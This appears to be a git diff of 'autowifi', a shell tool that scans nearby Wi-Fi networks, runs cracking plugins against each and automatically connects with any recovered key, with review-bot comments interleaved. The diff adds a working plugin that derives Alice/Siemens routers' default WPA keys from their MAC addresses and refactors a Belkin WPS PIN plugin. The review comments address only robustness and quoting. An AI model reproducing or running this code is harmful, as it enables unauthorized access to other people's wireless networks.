-rwxr-xr-x | usr/bin/autowifi | 19 | ||||
-rwxr-xr-x | usr/bin/autowifi_dryrun | 40 | ||||
-rw-r--r-- | usr/lib/autowifi/lib/plugin_core | 26 | ||||
-rwxr-xr-x | usr/lib/autowifi/plugins/02alice | 20 | ||||
-rwxr-xr-x | usr/lib/autowifi/plugins/11belkin_wps | 9 |
5 files changed, 78 insertions, 36 deletions
diff --git a/usr/bin/autowifi b/usr/bin/autowifi index 1969e650..5de46f41 100755 --- a/usr/bin/autowifi +++ b/usr/bin/autowifi @@ -114,6 +114,21 @@ loop_over_cracks(){ done return 1 } +loop_cracks_over_networks(){ + wifi_init + for crack in $(find $crackdir -type f | sort -u); do + for i in `seq 1 $WIFI_COUNT`; do + KEY="$(eval root=$root \$crack \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${FREQ_${i}} \${ENCRYPTION_${i}})" + if [ $? -eq 0 ]; then + eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\" + if [ $? -eq 0 ]; then + return 0 + fi + fi + done + done + +} #scan_all(){ # for i in `seq 1 $WIFI_COUNT`; do @@ -151,11 +166,11 @@ elif [ -n "$1" ]; then connect_to_network_by_ssid "$1" else echo looping network now - check_internet || loop_over_networks + check_internet || loop_cracks_over_networks while sleep 60; do if ! check_internet; then - loop_over_networks + loop_cracks_over_networks fi done fi diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun index 1df94119..8860b4a6 100755 --- a/usr/bin/autowifi_dryrun +++ b/usr/bin/autowifi_dryrun 
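Review bot: `loop_cracks_over_networks` has no final `return 1`, so when no plugin produces a key that connects, the function returns the status of the last `if`, which is 0. `loop_over_cracks` directly above ends with `return 1`, and the new function should do the same before its closing brace. The plugin list comes from the unquoted `$(find $crackdir -type f | sort -u)` and is run through `eval ... \$crack`, so a plugin path containing whitespace is split; quoting `"$crackdir"` and passing `\"\$crack\"` avoids that. `\${FREQ_${i}}` and `\${ENCRYPTION_${i}}` are scan-derived and are the only arguments left unquoted inside the two `eval` lines; writing them as `\"\${FREQ_${i}}\"` keeps a malformed scan field from being word-split or globbed.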
@@ -2,30 +2,23 @@ # ENV: # the root directory (e.g. root=$PWD/../../ if run from here ) cd $(dirname $(readlink -f $0)) -root=${root:-/} -wifi=${wifi:-wlan0} - test "${1:-}" = 'quiet' && exec 2>&- -# for iwlist_scan -. $root/usr/lib/autowifi/lib/iwlist +interface=${interface:-wlan0} +root=${root:-../../} +crackdir=$root/usr/lib/autowifi/plugins +wifi_keys=$root/etc/autowifi/wifi_keys +wifi_log=$root/var/log/autowifi.log -# . $ROOT/usr/lib/autowifi/lib/ +# exists() run_hooks() +. $root/usr/lib/autowifi/lib/core -# for check_internet and check_gateway -# . /usr/lib/autowifi/lib/network +# start_wpa_supplicant() +. $root/usr/lib/autowifi/lib/wpa_supplicant crack_wifi(){ - #SSID MAC CHANNEL ENCRYPTION WPA WPA2 - if [ "$4" == off ];then - encr=open - elif [ "$6" -eq 1 ]; then - encr=psk2 - elif [ "$5" -eq 1 ]; then - encr=psk - elif [ "$4" == on ]; then - encr=wep - fi + #SSID MAC CHANNEL ENCRYPTION + ALL_RET=1 for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do printf "%s" "Trying $(basename $hack) against $1 : " >&2 @@ -41,13 +34,18 @@ crack_wifi(){ done return $ALL_RET } +wifi_init(){ + wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant + wifi_scan > /tmp/${interface}.scan + . /tmp/${interface}.scan +} loop_over_networks(){ - . /tmp/${wifi}.scan + wifi_init + echo "SSID:MAC:CHANNEL:ENCRYPTION:key" for i in `seq 1 $WIFI_COUNT`; do - eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}} + eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} done } -iwlist_scan > /tmp/${wifi}.scan loop_over_networks diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core index da003350..1b83b0c3 100644 --- a/usr/lib/autowifi/lib/plugin_core +++ b/usr/lib/autowifi/lib/plugin_core 
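Review bot: `root` now defaults to the relative `../../` and is expanded unquoted in `. $root/usr/lib/autowifi/lib/core` and `. $root/usr/lib/autowifi/lib/wpa_supplicant`, so a `root` value containing whitespace breaks both lines; quote them, e.g. `. "$root/usr/lib/autowifi/lib/core"`. Because the value comes from the environment and decides which files are sourced, a comment saying that `root` must point at a trusted tree would help. The new `crackdir` variable is defined, but the `find` in `crack_wifi` still spells out `$root/usr/lib/autowifi/plugins`; using `"$crackdir"` there keeps the two in step. `crack_wifi` continues past the end of this hunk.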
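Review bot: `wifi_init` writes the scan to the fixed path `/tmp/${interface}.scan` and then sources it, which is unsafe on two counts: any local user can pre-create or symlink that name in the world-writable `/tmp`, and the file carries fields such as the ESSID that are chosen by whoever operates a nearby access point. Whether those fields are safely quoted depends on `wifi_scan`, which is not visible here, so the `.` should not rely on it without a check. At minimum use a private file: `scan=$(mktemp) || return 1`, then `wifi_scan > "$scan" && . "$scan"`, then `rm -f -- "$scan"`. The fixed `/tmp/autowifi.wpa_supplicant` argument probably deserves the same treatment, and `loop_over_networks` still passes `\${MAC_${i}}`, `\${CHANNEL_${i}}` and `\${ENCRYPTION_${i}}` to `eval` unquoted.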
@@ -1,24 +1,38 @@ +#!/bin/sh parse_plugin_args(){ [ $# -ne 4 ] && plugin_usage && exit 1 # convenience function to put args in ENV variables ESSID="$1" - MAC="$2" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} CHANNEL="$3" ENC="$4" - if [ ${#MAC} -ne 17 ] ;then + if [ ${#MAC} -ne 12 ] ;then echo "MAC malformed" exit 1 fi } plugin_usage(){ cat << EOF -usage: $0 ESSID MAC CHANNEL ENC WPA WPA2" +usage: $0 ESSID MAC CHANNEL ENC" ESSID - string MAC - 00:11:22:33:44:55 - ENC - on | off - WPA - 0 | 1 - WPA2 - 0 | 1 + CHANNEL - 4 + ENC - wpa EOF } + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice new file mode 100755 index 00000000..1b4533a4 --- /dev/null +++ b/usr/lib/autowifi/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 82140523..65e08624 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps 
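Review bot: `parse_plugin_args` accepts any 12-character string as `MAC` once the colons are stripped, and plugins then feed it into arithmetic (`$((0x${MAC}-1))` in 02alice), so it should be checked for hex digits and not only length: `case "$MAC" in *[!0-9A-Fa-f]*) echo "MAC malformed"; exit 1;; esac`. The length test also runs after `VENDOR_MAC` and `PRIVATE_MAC` have been cut, and `${MAC:6:12}` asks for 12 characters where only 6 remain; validate first and use `${MAC:6:6}`. In `check_vendor_mac`, `printf $1` and `printf $i` use the data as the format string; `printf '%s' "$1"` is the safe form. The usage text also keeps a stray closing quote after `ENC`.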
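Review bot: The new 02alice plugin declares `#!/bin/sh` but uses `${TMP:0:12}` and, through the sourced plugin_core, `${MAC:0:6}` and `[ ... == ... ]`, none of which are POSIX; where `/bin/sh` is dash the substring expansion stops the script with a bad-substitution error. Either change the shebang to `#!/bin/bash` or replace the substrings with a portable form such as `cut -c1-12`. `printf $ETHMAC` and `printf ${TMP:0:12}` should pass the value as an argument, `printf '%s' "$ETHMAC"`. A MAC of all zeros makes `$((0x${MAC}-1))` negative, which `%012x` prints as more than 12 digits in bash, so that input should be rejected before the computation.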
@@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0)) . ../lib/wps parse_plugin_args "$@" -MAC=$(printf "%s" $MAC| sed 's/://g') -VENDOR_MAC=${MAC:0:6} -PRIVATE_MAC=${MAC:6:12} -if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then - echo "VENDOR MAC $VENDOR_MAC not affected" - exit 1 -fi + +! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 calc_belkin(){ PRIVATE_MAC=${1} |